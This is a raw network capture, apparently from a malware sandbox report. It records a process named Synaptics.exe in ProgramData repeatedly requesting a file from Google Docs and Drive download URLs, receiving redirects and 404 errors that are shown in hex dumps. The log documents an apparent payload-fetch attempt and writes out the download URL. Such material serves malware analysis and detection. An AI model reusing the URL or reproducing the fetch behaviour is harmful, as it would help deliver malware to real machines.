                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:52 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BImxHhoL184sTGoxwOEBwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            47192.168.2.949959216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC46gvwpuLWds7h9u7lZ6o86Z4IMGuFfONnNlzF2URs8PiH-leQ5UmpaM2JXAX5tXeJGwTUOh0I
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BdrCW2XPztuyzis3Ef23rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 76 6d 34 54 63 4d 43 50 74 76 49 78 62 36 77 4d 4a 55 58 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="7vm4TcMCPtvIxb6wMJUXHw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            48192.168.2.949960172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:52 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cxwuMixRfqXoCDLGyCPcgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            49192.168.2.949961216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7J-nxq6HqfLMYQwZ_QoJWWVk4MszAoPGD8_BrDFzzOuK4UTJB3md9PQtqgnzvKHwsw_2ha0vs
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-N3xFILOYhZaGphVIq2ge3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 67 67 63 5f 72 70 4b 45 65 70 67 58 63 65 4f 33 49 55 62 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="fggc_rpKEepgXceO3IUbig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            50192.168.2.949970216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            51192.168.2.949968172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            52192.168.2.949971172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:53 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:53 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NCajbRUh8_mifz2vaWNyZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            53192.168.2.949978172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:54 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:53 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GR1f49Z7zqmusldxUXi2jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            54192.168.2.949986172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:54 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:54 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hwYQ1kib8iJnRYhf8rSVuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            55192.168.2.949985216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:54 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:54 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC68IMqGZPP_J7AFqIJnOfTnvCm4yWsBvlpkpN-yJPBGL8xfigLlcwt9NDbh_xiHc7aI
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:54 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8NyWU9oTUVYrSyKfg1ZMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:54 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
